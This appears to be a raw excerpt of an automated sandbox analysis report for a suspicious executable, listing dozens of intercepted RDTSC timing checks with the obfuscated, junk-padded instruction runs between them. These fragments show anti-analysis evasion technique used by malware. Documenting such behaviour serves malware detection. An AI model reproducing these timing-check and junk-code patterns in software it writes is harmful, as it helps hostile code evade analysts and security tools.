Source: C:\Users\user\Desktop\tXEKP1ThBP.exeRDTSC instruction interceptor: First address: 4D31097 second address: 4D310B4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F77012B90F9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\tXEKP1ThBP.exeRDTSC instruction interceptor: First address: 4D310B4 second address: 4D310C4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F77004F22BCh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\tXEKP1ThBP.exeRDTSC instruction interceptor: First address: 4D310C4 second address: 4D310C8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\tXEKP1ThBP.exeRDTSC instruction interceptor: First address: 4D310C8 second address: 4D310D7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 nop 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
Source: C:\Users\user\Desktop\tXEKP1ThBP.exeRDTSC instruction interceptor: First address: 4D310D7 second address: 4D310DB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\tXEKP1ThBP.exeRDTSC instruction interceptor: First address: 4D310DB second address: 4D310E1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\tXEKP1ThBP.exeRDTSC instruction interceptor: First address: 4D310E1 second address: 4D310E7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\tXEKP1ThBP.exeRDTSC instruction interceptor: First address: 4D310E7 second address: 4D310EB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\tXEKP1ThBP.exeRDTSC instruction interceptor: First address: 4D310EB second address: 4D310EF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\tXEKP1ThBP.exeRDTSC instruction interceptor: First address: 4D310EF second address: 4D3114C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 lea eax, dword ptr [ebp-18h] 0x0000000b jmp 00007F77004F22C9h 0x00000010 nop 0x00000011 pushad 0x00000012 pushfd 0x00000013 jmp 00007F77004F22BCh 0x00000018 adc esi, 3B67DF08h 0x0000001e jmp 00007F77004F22BBh 0x00000023 popfd 0x00000024 push eax 0x00000025 push edx 0x00000026 jmp 00007F77004F22C6h 0x0000002b rdtsc
Source: C:\Users\user\Desktop\tXEKP1ThBP.exeRDTSC instruction interceptor: First address: 4D31194 second address: 4D311B2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov cl, dh 0x00000005 mov bx, cx 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov edi, eax 0x0000000d jmp 00007F77012B90EAh 0x00000012 test edi, edi 0x00000014 pushad 0x00000015 push eax 0x00000016 push edx 0x00000017 pushad 0x00000018 popad 0x00000019 rdtsc
Source: C:\Users\user\Desktop\tXEKP1ThBP.exeRDTSC instruction interceptor: First address: 4D311B2 second address: 4D311FE instructions: 0x00000000 rdtsc 0x00000002 mov esi, 64721EE9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a movzx eax, di 0x0000000d movsx edx, ax 0x00000010 popad 0x00000011 popad 0x00000012 js 00007F77729807A1h 0x00000018 jmp 00007F77004F22C8h 0x0000001d mov eax, dword ptr [ebp-14h] 0x00000020 push eax 0x00000021 push edx 0x00000022 jmp 00007F77004F22C7h 0x00000027 rdtsc
Source: C:\Users\user\Desktop\tXEKP1ThBP.exeRDTSC instruction interceptor: First address: 4D311FE second address: 4D31204 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\tXEKP1ThBP.exeRDTSC instruction interceptor: First address: 4D31204 second address: 4D31208 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\tXEKP1ThBP.exeRDTSC instruction interceptor: First address: 4D31208 second address: 4D31233 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F77012B90EBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov ecx, esi 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 pushad 0x00000011 popad 0x00000012 call 00007F77012B90F1h 0x00000017 pop eax 0x00000018 popad 0x00000019 rdtsc
Source: C:\Users\user\Desktop\tXEKP1ThBP.exeRDTSC instruction interceptor: First address: 4D31233 second address: 4D31263 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F77004F22BEh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esi+0Ch], eax 0x0000000c jmp 00007F77004F22C0h 0x00000011 mov edx, 772406ECh 0x00000016 push eax 0x00000017 push edx 0x00000018 push eax 0x00000019 push edx 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
Source: C:\Users\user\Desktop\tXEKP1ThBP.exeRDTSC instruction interceptor: First address: 4D31263 second address: 4D31267 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\tXEKP1ThBP.exeRDTSC instruction interceptor: First address: 4D31267 second address: 4D31284 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F77004F22C9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\tXEKP1ThBP.exeRDTSC instruction interceptor: First address: 4D31284 second address: 4D31315 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F77012B90F7h 0x00000008 mov ecx, 508FA94Fh 0x0000000d popad 0x0000000e pop edx 0x0000000f pop eax 0x00000010 sub eax, eax 0x00000012 pushad 0x00000013 mov bh, E7h 0x00000015 movzx eax, dx 0x00000018 popad 0x00000019 lock cmpxchg dword ptr [edx], ecx 0x0000001d jmp 00007F77012B90F5h 0x00000022 pop edi 0x00000023 jmp 00007F77012B90EEh 0x00000028 test eax, eax 0x0000002a jmp 00007F77012B90F0h 0x0000002f jne 00007F77737474D9h 0x00000035 pushad 0x00000036 push eax 0x00000037 push edx 0x00000038 pushfd 0x00000039 jmp 00007F77012B90ECh 0x0000003e jmp 00007F77012B90F5h 0x00000043 popfd 0x00000044 rdtsc
Source: C:\Users\user\Desktop\tXEKP1ThBP.exeRDTSC instruction interceptor: First address: 4D31315 second address: 4D31383 instructions: 0x00000000 rdtsc 0x00000002 pushfd 0x00000003 jmp 00007F77004F22C0h 0x00000008 jmp 00007F77004F22C5h 0x0000000d popfd 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push ecx 0x00000011 pushfd 0x00000012 jmp 00007F77004F22C7h 0x00000017 add si, 7A8Eh 0x0000001c jmp 00007F77004F22C9h 0x00000021 popfd 0x00000022 pop esi 0x00000023 popad 0x00000024 mov edx, dword ptr [ebp+08h] 0x00000027 push eax 0x00000028 push edx 0x00000029 push eax 0x0000002a push edx 0x0000002b pushad 0x0000002c popad 0x0000002d rdtsc
Source: C:\Users\user\Desktop\tXEKP1ThBP.exeRDTSC instruction interceptor: First address: 4D31383 second address: 4D3139B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F77012B90F4h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\tXEKP1ThBP.exeRDTSC instruction interceptor: First address: 4D3139B second address: 4D313B2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F77004F22BBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [esi] 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 popad 0x00000011 rdtsc
Source: C:\Users\user\Desktop\tXEKP1ThBP.exeRDTSC instruction interceptor: First address: 4D313B2 second address: 4D313B8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\tXEKP1ThBP.exeRDTSC instruction interceptor: First address: 4D313B8 second address: 4D313D5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F77004F22C9h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\tXEKP1ThBP.exeRDTSC instruction interceptor: First address: 4D313D5 second address: 4D313D9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\tXEKP1ThBP.exeRDTSC instruction interceptor: First address: 4D313D9 second address: 4D31411 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [edx], eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d pushfd 0x0000000e jmp 00007F77004F22C6h 0x00000013 sbb ax, 7C28h 0x00000018 jmp 00007F77004F22BBh 0x0000001d popfd 0x0000001e push ecx 0x0000001f pop edi 0x00000020 popad 0x00000021 rdtsc
Source: C:\Users\user\Desktop\tXEKP1ThBP.exeRDTSC instruction interceptor: First address: 4D31411 second address: 4D31417 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\tXEKP1ThBP.exeRDTSC instruction interceptor: First address: 4D31417 second address: 4D3141B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\tXEKP1ThBP.exeRDTSC instruction interceptor: First address: 4D3141B second address: 4D3141F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\tXEKP1ThBP.exeRDTSC instruction interceptor: First address: 4D3141F second address: 4D31434 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr [esi+04h] 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e mov si, DA2Bh 0x00000012 mov ebx, eax 0x00000014 popad 0x00000015 rdtsc
Source: C:\Users\user\Desktop\tXEKP1ThBP.exeRDTSC instruction interceptor: First address: 4D31434 second address: 4D314CB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ebx, 5C244E1Eh 0x00000008 pushad 0x00000009 popad 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d mov dword ptr [edx+04h], eax 0x00000010 jmp 00007F77012B90EBh 0x00000015 mov eax, dword ptr [esi+08h] 0x00000018 pushad 0x00000019 pushfd 0x0000001a jmp 00007F77012B90F4h 0x0000001f sub ah, 00000018h 0x00000022 jmp 00007F77012B90EBh 0x00000027 popfd 0x00000028 mov cx, 5FCFh 0x0000002c popad 0x0000002d mov dword ptr [edx+08h], eax 0x00000030 push eax 0x00000031 push edx 0x00000032 pushad 0x00000033 pushfd 0x00000034 jmp 00007F77012B90F7h 0x00000039 sbb esi, 3F22A58Eh 0x0000003f jmp 00007F77012B90F9h 0x00000044 popfd 0x00000045 jmp 00007F77012B90F0h 0x0000004a popad 0x0000004b rdtsc
Source: C:\Users\user\Desktop\tXEKP1ThBP.exeRDTSC instruction interceptor: First address: 4D314CB second address: 4D31522 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F77004F22C1h 0x00000009 sub si, E876h 0x0000000e jmp 00007F77004F22C1h 0x00000013 popfd 0x00000014 jmp 00007F77004F22C0h 0x00000019 popad 0x0000001a pop edx 0x0000001b pop eax 0x0000001c mov eax, dword ptr [esi+0Ch] 0x0000001f push eax 0x00000020 push edx 0x00000021 pushad 0x00000022 jmp 00007F77004F22BDh 0x00000027 mov si, D147h 0x0000002b popad 0x0000002c rdtsc
Source: C:\Users\user\Desktop\tXEKP1ThBP.exeRDTSC instruction interceptor: First address: 4D31522 second address: 4D31560 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F77012B90EDh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [edx+0Ch], eax 0x0000000c jmp 00007F77012B90EEh 0x00000011 mov eax, dword ptr [esi+10h] 0x00000014 jmp 00007F77012B90F0h 0x00000019 mov dword ptr [edx+10h], eax 0x0000001c push eax 0x0000001d push edx 0x0000001e push eax 0x0000001f push edx 0x00000020 pushad 0x00000021 popad 0x00000022 rdtsc
Source: C:\Users\user\Desktop\tXEKP1ThBP.exeRDTSC instruction interceptor: First address: 4D31560 second address: 4D31566 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\tXEKP1ThBP.exeRDTSC instruction interceptor: First address: 4D31566 second address: 4D3156C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\tXEKP1ThBP.exeRDTSC instruction interceptor: First address: 4D3156C second address: 4D31570 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\tXEKP1ThBP.exeRDTSC instruction interceptor: First address: 4D31570 second address: 4D31586 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr [esi+14h] 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e mov ebx, 17B3492Ah 0x00000013 push edi 0x00000014 pop esi 0x00000015 popad 0x00000016 rdtsc
Source: C:\Users\user\Desktop\tXEKP1ThBP.exeRDTSC instruction interceptor: First address: 4D31586 second address: 4D3159D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F77004F22C3h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\tXEKP1ThBP.exeRDTSC instruction interceptor: First address: 4D3159D second address: 4D31641 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [edx+14h], eax 0x0000000b pushad 0x0000000c pushfd 0x0000000d jmp 00007F77012B90EBh 0x00000012 adc cx, 232Eh 0x00000017 jmp 00007F77012B90F9h 0x0000001c popfd 0x0000001d mov edi, eax 0x0000001f popad 0x00000020 mov eax, dword ptr [esi+18h] 0x00000023 jmp 00007F77012B90EAh 0x00000028 mov dword ptr [edx+18h], eax 0x0000002b jmp 00007F77012B90F0h 0x00000030 mov eax, dword ptr [esi+1Ch] 0x00000033 jmp 00007F77012B90F0h 0x00000038 mov dword ptr [edx+1Ch], eax 0x0000003b jmp 00007F77012B90F0h 0x00000040 mov eax, dword ptr [esi+20h] 0x00000043 pushad 0x00000044 push eax 0x00000045 push edx 0x00000046 pushfd 0x00000047 jmp 00007F77012B90ECh 0x0000004c and ax, CD68h 0x00000051 jmp 00007F77012B90EBh 0x00000056 popfd 0x00000057 rdtsc
Source: C:\Users\user\Desktop\tXEKP1ThBP.exeRDTSC instruction interceptor: First address: 4D31641 second address: 4D316EF instructions: 0x00000000 rdtsc 0x00000002 pushfd 0x00000003 jmp 00007F77004F22C8h 0x00000008 or ah, FFFFFFC8h 0x0000000b jmp 00007F77004F22BBh 0x00000010 popfd 0x00000011 pop edx 0x00000012 pop eax 0x00000013 mov bl, cl 0x00000015 popad 0x00000016 mov dword ptr [edx+20h], eax 0x00000019 jmp 00007F77004F22BBh 0x0000001e mov eax, dword ptr [esi+24h] 0x00000021 pushad 0x00000022 jmp 00007F77004F22C4h 0x00000027 push esi 0x00000028 mov dh, 7Fh 0x0000002a pop ecx 0x0000002b popad 0x0000002c mov dword ptr [edx+24h], eax 0x0000002f pushad 0x00000030 movsx edx, ax 0x00000033 movzx esi, dx 0x00000036 popad 0x00000037 mov eax, dword ptr [esi+28h] 0x0000003a pushad 0x0000003b mov edi, 3EA1F2CCh 0x00000040 pushfd 0x00000041 jmp 00007F77004F22C5h 0x00000046 sbb ax, 2BA6h 0x0000004b jmp 00007F77004F22C1h 0x00000050 popfd 0x00000051 popad 0x00000052 mov dword ptr [edx+28h], eax 0x00000055 push eax 0x00000056 push edx 0x00000057 jmp 00007F77004F22BDh 0x0000005c rdtsc
Source: C:\Users\user\Desktop\tXEKP1ThBP.exeRDTSC instruction interceptor: First address: 4D316EF second address: 4D316F5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\tXEKP1ThBP.exeRDTSC instruction interceptor: First address: 4D316F5 second address: 4D316F9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\tXEKP1ThBP.exeRDTSC instruction interceptor: First address: 4D316F9 second address: 4D3176C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov ecx, dword ptr [esi+2Ch] 0x0000000b pushad 0x0000000c mov esi, ebx 0x0000000e pushfd 0x0000000f jmp 00007F77012B90F1h 0x00000014 sub ch, 00000066h 0x00000017 jmp 00007F77012B90F1h 0x0000001c popfd 0x0000001d popad 0x0000001e mov dword ptr [edx+2Ch], ecx 0x00000021 push eax 0x00000022 push edx 0x00000023 pushad 0x00000024 pushfd 0x00000025 jmp 00007F77012B90F3h 0x0000002a or cx, D99Eh 0x0000002f jmp 00007F77012B90F9h 0x00000034 popfd 0x00000035 movzx eax, dx 0x00000038 popad 0x00000039 rdtsc
Source: C:\Users\user\Desktop\tXEKP1ThBP.exeRDTSC instruction interceptor: First address: 4D3176C second address: 4D31772 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\tXEKP1ThBP.exeRDTSC instruction interceptor: First address: 4D31772 second address: 4D31776 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\tXEKP1ThBP.exeRDTSC instruction interceptor: First address: 4D31776 second address: 4D31790 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov ax, word ptr [esi+30h] 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007F77004F22BAh 0x00000015 rdtsc
Source: C:\Users\user\Desktop\tXEKP1ThBP.exeRDTSC instruction interceptor: First address: 4D31790 second address: 4D31796 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\tXEKP1ThBP.exeRDTSC instruction interceptor: First address: 4D31796 second address: 4D317A7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F77004F22BDh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\tXEKP1ThBP.exeRDTSC instruction interceptor: First address: 4D318EB second address: 4D318FB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F77012B90ECh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\tXEKP1ThBP.exeRDTSC instruction interceptor: First address: 4D318FB second address: 4D3194C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jne 00007F77729800CAh 0x0000000e jmp 00007F77004F22C7h 0x00000013 or dword ptr [edx+38h], FFFFFFFFh 0x00000017 jmp 00007F77004F22C6h 0x0000001c or dword ptr [edx+3Ch], FFFFFFFFh 0x00000020 push eax 0x00000021 push edx 0x00000022 push eax 0x00000023 push edx 0x00000024 jmp 00007F77004F22BAh 0x00000029 rdtsc
Source: C:\Users\user\Desktop\tXEKP1ThBP.exeRDTSC instruction interceptor: First address: 4D3194C second address: 4D31952 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\tXEKP1ThBP.exeRDTSC instruction interceptor: First address: 4D31952 second address: 4D31958 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\tXEKP1ThBP.exeRDTSC instruction interceptor: First address: 4D31958 second address: 4D3195C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\tXEKP1ThBP.exeRDTSC instruction interceptor: First address: 4D3195C second address: 4D319C7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 or dword ptr [edx+40h], FFFFFFFFh 0x0000000c pushad 0x0000000d pushfd 0x0000000e jmp 00007F77004F22C2h 0x00000013 jmp 00007F77004F22C5h 0x00000018 popfd 0x00000019 pushad 0x0000001a mov ax, C58Dh 0x0000001e mov dl, cl 0x00000020 popad 0x00000021 popad 0x00000022 pop esi 0x00000023 pushad 0x00000024 mov edx, 3B340466h 0x00000029 call 00007F77004F22C7h 0x0000002e mov esi, 12452F8Fh 0x00000033 pop esi 0x00000034 popad 0x00000035 pop ebx 0x00000036 push eax 0x00000037 push edx 0x00000038 push eax 0x00000039 push edx 0x0000003a pushad 0x0000003b popad 0x0000003c rdtsc
Source: C:\Users\user\Desktop\tXEKP1ThBP.exeRDTSC instruction interceptor: First address: 4D319C7 second address: 4D319E3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F77012B90F8h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\tXEKP1ThBP.exeRDTSC instruction interceptor: First address: 4D319E3 second address: 4D31A2F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov dx, 6114h 0x00000007 movsx edi, ax 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d leave 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 pushfd 0x00000012 jmp 00007F77004F22C1h 0x00000017 sub si, 9086h 0x0000001c jmp 00007F77004F22C1h 0x00000021 popfd 0x00000022 call 00007F77004F22C0h 0x00000027 pop esi 0x00000028 popad 0x00000029 rdtsc
Source: C:\Users\user\Desktop\tXEKP1ThBP.exeRDTSC instruction interceptor: First address: 4D31A2F second address: 4D31A35 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\tXEKP1ThBP.exeRDTSC instruction interceptor: First address: 4D31A35 second address: 4D31A39 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\tXEKP1ThBP.exeRDTSC instruction interceptor: First address: 4D80009 second address: 4D8000E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\tXEKP1ThBP.exeRDTSC instruction interceptor: First address: 4D8000E second address: 4D80054 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F77004F22C1h 0x00000009 add cx, 6DD6h 0x0000000e jmp 00007F77004F22C1h 0x00000013 popfd 0x00000014 popad 0x00000015 pop edx 0x00000016 pop eax 0x00000017 push eax 0x00000018 push eax 0x00000019 push edx 0x0000001a pushad 0x0000001b call 00007F77004F22BFh 0x00000020 pop eax 0x00000021 mov dh, EFh 0x00000023 popad 0x00000024 rdtsc
Source: C:\Users\user\Desktop\tXEKP1ThBP.exeRDTSC instruction interceptor: First address: 4D10DEC second address: 4D10E44 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F77012B90F6h 0x00000009 sub ax, 2D28h 0x0000000e jmp 00007F77012B90EBh 0x00000013 popfd 0x00000014 popad 0x00000015 pop edx 0x00000016 pop eax 0x00000017 mov dword ptr [esp], ebp 0x0000001a jmp 00007F77012B90F6h 0x0000001f mov ebp, esp 0x00000021 pushad 0x00000022 mov dl, 97h 0x00000024 popad 0x00000025 pop ebp 0x00000026 push eax 0x00000027 push edx 0x00000028 pushad 0x00000029 mov di, CA64h 0x0000002d mov esi, ebx 0x0000002f popad 0x00000030 rdtsc
Source: C:\Users\user\Desktop\tXEKP1ThBP.exeRDTSC instruction interceptor: First address: 4D31A63 second address: 4D31A8D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 mov bx, C5A0h 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push esi 0x0000000d jmp 00007F77004F22C4h 0x00000012 mov dword ptr [esp], ebp 0x00000015 push eax 0x00000016 push edx 0x00000017 push eax 0x00000018 push edx 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
Source: C:\Users\user\Desktop\tXEKP1ThBP.exeRDTSC instruction interceptor: First address: 4D31A8D second address: 4D31A91 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\tXEKP1ThBP.exeRDTSC instruction interceptor: First address: 4D31A91 second address: 4D31AAE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F77004F22C9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\tXEKP1ThBP.exeRDTSC instruction interceptor: First address: 4D31AAE second address: 4D31AED instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 call 00007F77012B90F7h 0x00000008 pop esi 0x00000009 jmp 00007F77012B90F9h 0x0000000e popad 0x0000000f pop edx 0x00000010 pop eax 0x00000011 mov ebp, esp 0x00000013 push eax 0x00000014 push edx 0x00000015 push eax 0x00000016 push edx 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
Source: C:\Users\user\Desktop\tXEKP1ThBP.exeRDTSC instruction interceptor: First address: 4D31AED second address: 4D31AF1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\tXEKP1ThBP.exeRDTSC instruction interceptor: First address: 4D31AF1 second address: 4D31B04 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F77012B90EFh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\tXEKP1ThBP.exeRDTSC instruction interceptor: First address: 4D31B04 second address: 4D31B0A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\tXEKP1ThBP.exeRDTSC instruction interceptor: First address: 4D31B0A second address: 4D31B0E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\tXEKP1ThBP.exeRDTSC instruction interceptor: First address: 4D31B0E second address: 4D31B25 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push dword ptr [ebp+04h] 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F77004F22BAh 0x00000012 rdtsc
Source: C:\Users\user\Desktop\tXEKP1ThBP.exeRDTSC instruction interceptor: First address: 4D31B25 second address: 4D31B2B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\tXEKP1ThBP.exeRDTSC instruction interceptor: First address: 4D31B2B second address: 4D31B2F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\tXEKP1ThBP.exeRDTSC instruction interceptor: First address: 4D70237 second address: 4D7023B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\tXEKP1ThBP.exeRDTSC instruction interceptor: First address: 4D7023B second address: 4D70258 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F77004F22C9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
